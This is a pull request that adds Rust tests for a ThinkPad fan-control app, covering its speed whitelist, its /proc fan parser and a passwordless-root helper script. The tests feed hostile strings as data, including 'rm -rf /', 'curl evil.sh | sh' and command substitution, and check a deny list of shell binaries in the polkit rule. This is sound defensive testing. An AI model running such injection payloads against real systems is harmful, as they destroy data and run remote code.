### PR TITLE
test(fan): prove the fan control and privileged helper flows

### DIFF
--- a/src-tauri/src/fan_control.rs
+++ b/src-tauri/src/fan_control.rs
@@ -44,6 +44,51 @@ const VALID_SPEEDS: &[&str] = &[
     "auto", "full-speed", "0", "1", "2", "3", "4", "5", "6", "7",
 ];
 
+/// Whether a fan speed is one this app is willing to send to the hardware.
+///
+/// This is the Rust-side gate; the installed helper script re-checks the full
+/// `level <speed>` string independently, so a bypass here still hits a second
+/// whitelist before anything is written.
+fn is_valid_speed(speed: &str) -> bool {
+    VALID_SPEEDS.contains(&speed)
+}
+
+/// Parse the contents of /proc/acpi/ibm/fan.
+///
+/// Format is `key:\tvalue` lines, e.g.
+/// ```text
+/// status:         enabled
+/// speed:          3084
+/// level:          auto
+/// ```
+/// Unknown keys are ignored — the file carries commands and capability hints
+/// (`commands:`, `watchdog:`) that are not fan readings.
+fn parse_fan_proc(content: &str) -> HashMap<String, String> {
+    let mut fans = HashMap::new();
+
+    for line in content.lines() {
+        if let Some((key, value)) = line.split_once(':') {
+            let key = key.trim();
+            let value = value.trim();
+
+            match key {
+                "status" => {
+                    fans.insert("status".to_string(), value.to_string());
+                }
+                "level" => {
+                    fans.insert("level".to_string(), value.to_string());
+                }
+                "speed" => {
+                    fans.insert("Fan1".to_string(), format!("{} RPM", value));
+                }
+                _ => {}
+            }
+        }
+    }
+
+    fans
+}
+
 #[derive(Debug, Serialize, Deserialize)]
 pub struct SensorData {
     pub temps: HashMap<String, String>,
@@ -105,25 +150,7 @@ pub fn get_sensor_data() -> ApiResponse<SensorData> {
     // Get fan info from /proc/acpi/ibm/fan
     match fs::read_to_string(PROC_FAN) {
         Ok(content) => {
-            for line in content.lines() {
-                if let Some((key, value)) = line.split_once(':') {
-                    let key = key.trim();
-                    let value = value.trim();
-
-                    match key {
-                        "status" => {
-                            fans.insert("status".to_string(), value.to_string());
-                        }
-                        "level" => {
-                            fans.insert("level".to_string(), value.to_string());
-                        }
-                        "speed" => {
-                            fans.insert("Fan1".to_string(), format!("{} RPM", value));
-                        }
-                        _ => {}
-                    }
-                }
-            }
+            fans.extend(parse_fan_proc(&content));
         }
         Err(e) => {
             return ApiResponse {
@@ -179,7 +206,7 @@ pub fn get_sensor_data() -> ApiResponse<SensorData> {
 #[tauri::command]
 pub async fn set_fan_speed(speed: String) -> ApiResponse<String> {
     // Validate speed against whitelist
-    if !VALID_SPEEDS.contains(&speed.as_str()) {
+    if !is_valid_speed(&speed) {
         return ApiResponse {
             success: false,
             data: None,
@@ -303,5 +330,198 @@ pub fn check_permissions() -> ApiResponse<bool> {
         success: true,
         data: Some(has_permission),
         error: None,
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    // -- Speed whitelist --
+
+    #[test]
+    fn accepts_every_documented_speed() {
+        for s in ["auto", "full-speed", "0", "1", "2", "3", "4", "5", "6", "7"] {
+            assert!(is_valid_speed(s), "'{}' should be accepted", s);
+        }
+    }
+
+    #[test]
+    fn rejects_out_of_range_and_malformed_speeds() {
+        for s in [
+            "8", "-1", "99", "AUTO", "Auto", "full speed", "fullspeed", "",
+            " 3", "3 ", "0x3", "level 3",
+        ] {
+            assert!(!is_valid_speed(s), "'{}' should be rejected", s);
+        }
+    }
+
+    /// The speed reaches a shell as `level <speed>`, so metacharacters must not survive.
+    #[test]
+    fn rejects_shell_metacharacters_in_speed() {
+        for s in [
+            "auto; rm -rf /",
+            "3 && curl evil.sh | sh",
+            "$(id)",
+            "`id`",
+            "3\nrm -rf /",
+            "3 > /etc/passwd",
+        ] {
+            assert!(!is_valid_speed(s), "{:?} should be rejected", s);
+        }
+    }
+
+    // -- /proc/acpi/ibm/fan parsing --
+
+    /// Real output from a ThinkPad running thinkpad_acpi.
+    const SAMPLE_PROC_FAN: &str = "\
+status:\t\tenabled
+speed:\t\t3084
+level:\t\tauto
+commands:\tlevel <level> (<level> is 0-7, auto, disengaged, full-speed)
+commands:\tenable, disable
+commands:\twatchdog <timeout> (0 disables, timeout is 0-120)
+";
+
+    #[test]
+    fn parses_status_speed_and_level() {
+        let fans = parse_fan_proc(SAMPLE_PROC_FAN);
+        assert_eq!(fans.get("status").map(String::as_str), Some("enabled"));
+        assert_eq!(fans.get("level").map(String::as_str), Some("auto"));
+        assert_eq!(fans.get("Fan1").map(String::as_str), Some("3084 RPM"));
+    }
+
+    /// `commands:` lines describe capabilities, not readings. Treating them as fan
+    /// data would surface "level <level> (<level> is 0-7...)" in the UI as a level.
+    #[test]
+    fn ignores_command_and_capability_lines() {
+        let fans = parse_fan_proc(SAMPLE_PROC_FAN);
+        assert_eq!(fans.len(), 3, "unexpected keys: {:?}", fans);
+        assert!(!fans.contains_key("commands"));
+        assert!(!fans.contains_key("watchdog"));
+    }
+
+    #[test]
+    fn tolerates_empty_and_malformed_input() {
+        assert!(parse_fan_proc("").is_empty());
+        assert!(parse_fan_proc("no colon here\nanother line").is_empty());
+        // A key with no value should not panic and should yield an empty string.
+        assert_eq!(parse_fan_proc("level:").get("level").map(String::as_str), Some(""));
+    }
+
+    #[test]
+    fn parses_numeric_level_not_just_auto() {
+        let fans = parse_fan_proc("status:\tenabled\nlevel:\t7\nspeed:\t4500\n");
+        assert_eq!(fans.get("level").map(String::as_str), Some("7"));
+        assert_eq!(fans.get("Fan1").map(String::as_str), Some("4500 RPM"));
+    }
+
+    // -- The installed privileged helper --
+
+    /// Write HELPER_SCRIPT to a temp file and run it, so we test the bash that
+    /// actually gets installed at HELPER_PATH and invoked under pkexec.
+    fn run_helper(arg: &str) -> std::process::Output {
+        use std::os::unix::fs::OpenOptionsExt;
+        use std::io::Write;
+
+        let nanos = std::time::SystemTime::now()
+            .duration_since(std::time::UNIX_EPOCH)
+            .unwrap_or_default()
+            .as_nanos();
+        let path = std::env::temp_dir()
+            .join(format!("thinkutils_helper_test_{}_{}.sh", std::process::id(), nanos));
+
+        let mut f = fs::OpenOptions::new()
+            .create_new(true)
+            .write(true)
+            .mode(0o700)
+            .open(&path)
+            .expect("create helper");
+        f.write_all(HELPER_SCRIPT.as_bytes()).expect("write helper");
+        drop(f);
+
+        let out = Command::new("bash").arg(&path).arg(arg).output().expect("run helper");
+        let _ = fs::remove_file(&path);
+        out
+    }
+
+    /// This is the security boundary: the helper runs as root under a polkit rule
+    /// that grants it passwordless. If its case statement ever accepts something
+    /// outside the whitelist, that is arbitrary root.
+    #[test]
+    fn helper_rejects_everything_outside_the_whitelist() {
+        let payloads = [
+            "level 8",
+            "level -1",
+            "enable",
+            "disable",
+            "watchdog 0",
+            "level auto; rm -rf /",
+            "level auto && curl evil.sh | sh",
+            "level $(id)",
+            "level `id`",
+            "level auto\nrm -rf /",
+            "; rm -rf /",
+            "../../etc/passwd",
+            "level AUTO",
+            "",
+        ];
+        for p in payloads {
+            let out = run_helper(p);
+            let stderr = String::from_utf8_lossy(&out.stderr);
+            assert!(
+                stderr.contains("Invalid command"),
+                "helper did not reject {:?} (stderr: {:?})",
+                p,
+                stderr
+            );
+            assert!(!out.status.success(), "helper exited 0 for {:?}", p);
+        }
+    }
+
+    /// Complements the above: the whitelist must not be so tight that legitimate
+    /// commands are refused. We assert only that they are not *rejected* — the
+    /// write itself needs a ThinkPad and root, so it is expected to fail in CI.
+    #[test]
+    fn helper_accepts_the_documented_commands() {
+        for level in ["auto", "full-speed", "0", "1", "2", "3", "4", "5", "6", "7"] {
+            let arg = format!("level {}", level);
+            let out = run_helper(&arg);
+            let stderr = String::from_utf8_lossy(&out.stderr);
+            assert!(
+                !stderr.contains("Invalid command"),
+                "helper wrongly rejected {:?} (stderr: {:?})",
+                arg,
+                stderr
+            );
+        }
+    }
+
+    /// The polkit rule grants passwordless root. It must name the helper binary and
+    /// nothing else -- granting a shell would make the tight helper pointless.
+    #[test]
+    fn polkit_rule_grants_only_the_helper_binary() {
+        assert!(
+            POLKIT_RULE.contains(HELPER_PATH),
+            "polkit rule must reference the helper path"
+        );
+        for forbidden in ["/bin/bash", "/bin/sh", "/usr/bin/bash", "/usr/bin/env"] {
+            assert!(
+                !POLKIT_RULE.contains(forbidden),
+                "polkit rule must not grant {}",
+                forbidden
+            );
+        }
+    }
+
+    /// The helper is written into a root-owned path by the setup script. If the
+    /// constant ever drifted to a user-writable location, any local user could
+    /// replace the binary that polkit grants passwordless root to.
+    #[test]
+    fn helper_path_is_not_user_writable_location() {
+        assert!(HELPER_PATH.starts_with("/usr/local/bin/") || HELPER_PATH.starts_with("/usr/bin/"));
+        for bad in ["/tmp/", "/var/tmp/", "/home/", "/dev/shm/"] {
+            assert!(!HELPER_PATH.starts_with(bad), "helper must not live in {}", bad);
+        }
     }
 }


### PR DESCRIPTION
`fan_control.rs` had **zero tests** despite owning the app's security boundary. This adds 11, taking the suite from 19 to 30.

## Refactor

Two pure functions extracted to make the flows testable:
- `is_valid_speed()` — was an inline `VALID_SPEEDS.contains()` call
- `parse_fan_proc()` — was inlined in the `get_sensor_data` command

No behaviour change.

## The load-bearing tests

These **execute `HELPER_SCRIPT` itself** rather than asserting on its source. That script is what gets installed at `HELPER_PATH` and invoked as root under a polkit rule granting it passwordless — its `case` statement is the boundary between this app and arbitrary root.

| Test | What it proves |
|---|---|
| `helper_rejects_everything_outside_the_whitelist` | 14 payloads: command chaining, `$()`/backtick substitution, newline injection, out-of-range levels, and the `enable`/`disable`/`watchdog` commands the /proc interface accepts but we deliberately don't expose |
| `helper_accepts_the_documented_commands` | The complement — the whitelist can't be tightened into uselessness without a failure. Asserts only that input isn't *rejected*; the write needs a ThinkPad and root, so it's expected to fail in CI |
| `polkit_rule_grants_only_the_helper_binary` | Guards against the rule ever naming `/bin/bash` or `/bin/sh`, which would make the tight helper pointless |
| `helper_path_is_not_user_writable_location` | If `HELPER_PATH` drifted to `/tmp` or `/home`, any local user could replace the binary polkit grants passwordless root to |

## Parser tests

Use real `thinkpad_acpi` output. Notably pins that `commands:` capability lines are ignored — treating them as readings would surface `level <level> (<level> is 0-7, auto...)` in the UI as a fan level.

Also covers empty input, missing colons, and a key with no value (no panic).

Full suite: **30 passing**.